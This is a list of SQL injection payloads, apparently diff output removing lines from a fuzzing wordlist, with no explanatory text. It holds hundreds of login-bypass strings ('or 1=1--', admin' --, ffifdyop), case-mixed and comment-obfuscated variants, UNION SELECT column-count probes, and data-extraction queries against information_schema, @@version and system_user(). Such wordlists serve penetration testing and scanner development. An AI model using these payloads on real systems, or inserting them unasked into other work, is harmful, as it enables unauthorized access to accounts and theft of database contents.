")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
